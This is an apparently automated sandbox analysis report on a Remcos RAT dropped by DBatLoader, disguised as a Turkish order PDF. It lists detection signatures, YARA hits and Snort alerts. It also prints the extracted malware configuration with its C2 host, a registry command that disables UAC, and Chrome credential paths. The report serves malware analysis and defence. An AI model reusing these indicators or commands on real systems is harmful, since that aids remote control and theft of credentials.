Windows Analysis Report
Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe

Overview

General Information

Sample Name:Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
Analysis ID:652390
MD5:8e60c68e832622b0ebd88a612898a9f9
SHA1:99c8a0db1608b7f3fe783829f13a6a594554f142
SHA256:6f4628db14ddcff78f5b0ad2c62f6791e4b29901eb9ef8a3686a2b7019308a99
Tags: exe, geoTUR

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected DBatLoader
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Contains functionality to capture and log keystrokes
Writes to foreign memory regions
Found stalling execution ending in API Sleep call
Contains functionality to steal Firefox passwords or cookies
Contains functionality to register a low level keyboard hook
Allocates memory in foreign processes
Injects a PE file into a foreign process
Contains functionality to steal Chrome passwords or cookies
Contains functionality to inject code into remote processes
Contains functionality to change the wallpaper
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
IP address seen in connection with other malware
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Potential key logger detected (key state polling based)
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality to read data from the clipboard

Classification

  • System is w10x64
  • Eluiezilfw.exe (PID: 6880 cmdline: "C:\Users\Public\Libraries\Eluiezilfw.exe" MD5: 8E60C68E832622B0EBD88A612898A9F9)
    • logagent.exe (PID: 3960 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
  • Eluiezilfw.exe (PID: 5628 cmdline: "C:\Users\Public\Libraries\Eluiezilfw.exe" MD5: 8E60C68E832622B0EBD88A612898A9F9)
    • DpiScaling.exe (PID: 5936 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
  • cleanup

Malware Configuration

{
  "Host:Port:Password": "Pw`~hustlelord.ddns.net:5017:",
  "Assigned name": "BIG",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Disable",
  "Install path": "AppData",
  "Copy file": "remcos.exe",
  "Startup value": "Remcos",
  "Hide file": "Disable",
  "Mutex": "Remcos-MZPAVR",
  "Keylog flag": "0",
  "Keylog path": "AppData",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "wikipedia;solitaire;",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5",
  "Audio path": "AppData",
  "Audio folder": "MicRecords",
  "Connect delay": "0",
  "Copy folder": "Remcos",
  "Keylog folder": "remcos",
  "Keylog file max size": "10000"
}

Yara matches: initial sample

Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe | Rule: JoeSecurity_DBatLoader | Description: Yara detected DBatLoader | Author: Joe Security

Yara matches: dropped files

Source: C:\Users\Public\Libraries\wflizeiulE.url | Rule: Methodology_Shortcut_HotKey | Description: Detects possible shortcut usage for .URL persistence | Author: @itsreallynick (Nick Carr)
  • 0x5a:$hotkey: \x0AHotKey=8
  • 0x0:$url_explicit: [InternetShortcut]
Source: C:\Users\Public\Libraries\wflizeiulE.url | Rule: Methodology_Contains_Shortcut_OtherURIhandlers | Description: Detects possible shortcut usage for .URL persistence | Author: @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
Source: C:\Users\Public\Libraries\Eluiezilfw.exe | Rule: JoeSecurity_DBatLoader | Description: Yara detected DBatLoader | Author: Joe Security

Yara matches: memory dumps

Source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000008.00000002.344209783.0000000000401000.00000020.00000001.01000000.00000005.sdmp | Rule: JoeSecurity_DBatLoader | Description: Yara detected DBatLoader | Author: Joe Security
Source: 00000008.00000002.348456214.0000000003C4C000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingComputerDefaults | Description: Yara detected UAC Bypass using ComputerDefaults | Author: Joe Security
Source: 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_DBatLoader | Description: Yara detected DBatLoader | Author: Joe Security
(5 of 50 memory dump matches shown)
Yara matches: unpacked PE files

Source: 3.2.logagent.exe.400000.0.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 3.2.logagent.exe.400000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | Description: Detects Windows executables potentially bypassing UAC using eventvwr.exe | Author: ditekSHen
  • 0x157b8:$s1: \Classes\mscfile\shell\open\command
  • 0x15830:$s1: \Classes\mscfile\shell\open\command
  • 0x15798:$s2: eventvwr.exe
Source: 3.2.logagent.exe.400000.0.unpack | Rule: Remcos_1 | Description: Remcos Payload | Author: kevoreilly
  • 0x16510:$name: Remcos
  • 0x16888:$name: Remcos
  • 0x16de0:$name: Remcos
  • 0x16e33:$name: Remcos
  • 0x15674:$time: %02i:%02i:%02i:%03i
  • 0x156fc:$time: %02i:%02i:%02i:%03i
  • 0x16be4:$time: %02i:%02i:%02i:%03i
  • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D 0C 72
Source: 3.2.logagent.exe.400000.0.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
  • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x159e0:$str_b2: Executing file:
  • 0x16798:$str_b3: GetDirectListeningPort
  • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x16534:$str_b5: licence_code.txt
  • 0x1649c:$str_b6: \restart.vbs
  • 0x163c0:$str_b8: \uninstall.vbs
  • 0x1596c:$str_b9: Downloaded file:
  • 0x15998:$str_b10: Downloading file:
  • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
  • 0x159fc:$str_b12: Failed to upload file:
  • 0x167d8:$str_b13: StartForward
  • 0x167bc:$str_b14: StopForward
  • 0x16330:$str_b15: fso.DeleteFile "
  • 0x16394:$str_b16: On Error Resume Next
  • 0x162fc:$str_b17: fso.DeleteFolder "
  • 0x15a14:$str_b18: Uploaded file:
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3ad0000.7.unpack | Rule: JoeSecurity_UACBypassusingComputerDefaults | Description: Yara detected UAC Bypass using ComputerDefaults | Author: Joe Security
(5 of 82 unpacked PE matches shown)
                    No Sigma rule has matched
Snort IDS alerts

Timestamp: 06/26/22-09:44:11.704757
Source IP: 192.168.2.3
Destination IP: 37.0.14.195
SID: 2844577
Source Port: 49778
Destination Port: 5017
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 06/26/22-09:44:57.649154
Source IP: 192.168.2.3
Destination IP: 37.0.14.195
SID: 2845323
Source Port: 49778
Destination Port: 5017
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 06/26/22-09:44:57.648577
Source IP: 37.0.14.195
Destination IP: 192.168.2.3
SID: 2845324
Source Port: 5017
Destination Port: 49778
Protocol: TCP
Classtype: A Network Trojan was detected


                    AV Detection

Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe | ReversingLabs: Detection: 21%
Source: C:\Users\Public\Libraries\Eluiezilfw.exe | ReversingLabs: Detection: 21%
                    Source: 8.3.Eluiezilfw.exe.3addbec.69.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad9a8c.88.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.2.Eluiezilfw.exe.2264588.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397dbec.67.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39754e0.103.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad3e08.77.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396d700.52.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964008.57.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968560.28.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac7bf0.17.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6c84.100.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6c84.102.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3aca22c.33.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac00d8.19.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac2dac.51.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acff08.24.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad3950.86.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3975fb8.44.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acff08.24.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6c84.101.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6588.94.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3967bf0.16.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac413c.59.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3adafd8.37.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3975fb8.42.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac3034.53.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6924.76.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396ff08.23.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.2.Eluiezilfw.exe.3168bd8.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973950.87.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3abdda4.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3abdda4.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964578.12.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3abe4d0.11.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ecc.86.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396704c.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3961b54.31.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac8008.22.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 15.2.DpiScaling.exe.10540000.1.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac00d8.18.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac03a8.27.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973e08.79.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac413c.60.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39603a8.26.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397d83c.74.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3971194.73.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6c84.100.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3abe240.7.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac2dac.49.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ae4008.38.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad46cc.98.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad17a0.67.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac52c8.9.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acc008.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac0168.22.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4578.10.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad28f8.32.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac26fc.0.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3963034.55.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962dac.49.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3979a8c.88.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4ae4.70.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39626fc.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad3e08.79.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4008.58.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966588.95.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.2.Eluiezilfw.exe.232a7c8.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396a22c.33.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6d08.104.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ae4008.36.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3aca22c.31.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3adafd8.34.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 3.0.logagent.exe.10540000.0.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad8008.107.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397f8dc.45.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6d08.104.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac704c.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad9a8c.89.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397bf00.63.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac3034.53.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac03a8.25.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39600d8.19.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acbbdc.13.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad1194.71.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4ae4.70.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4348.65.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad4008.93.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.23635e8.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac704c.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4008.57.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968560.27.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.2.Eluiezilfw.exe.3ab844c.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac5ee4.90.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad17a0.67.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6588.96.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad54e0.101.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3adf8dc.45.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3963034.53.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acdc40.56.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3978008.106.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad3950.87.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac5ecc.85.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac0024.15.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac8560.28.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acc008.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad17a0.65.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39746cc.98.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad46cc.96.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39652c8.9.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 3.2.logagent.exe.10540000.1.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac5ecc.84.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397d83c.75.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ae2814.97.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acdc40.56.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad5fb8.44.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396217c.47.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.2.logagent.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                    Source: 15.0.DpiScaling.exe.10540000.0.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac5ee4.92.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396ff08.24.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3967bf0.17.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960024.15.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396803c.108.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.22ea9c8.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acd700.50.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad5fb8.42.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3addbec.68.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.2.Eluiezilfw.exe.3ab844c.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4348.64.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4008.57.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpackAvira: Label: BDS/Backdoor.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac704c.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac413c.60.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.2.Eluiezilfw.exe.222a7c8.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac5ee4.90.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6588.94.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad1194.71.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad3950.87.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4348.66.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6588.95.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3979a8c.89.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ae4008.38.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3974008.93.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad8008.107.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39652c8.7.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39794ec.82.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad3950.85.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad28f8.35.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ecc.84.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad1194.74.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3adafd8.37.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad9a8c.89.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3aca22c.33.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ae2814.99.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4008.58.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973950.85.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 15.0.DpiScaling.exe.10540000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964008.58.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac5ecc.86.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3982814.97.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac2d80.40.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac217c.48.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3038bd8.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4578.10.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6924.78.unpackAvira: Label: TR/Patched.Ren.Gen
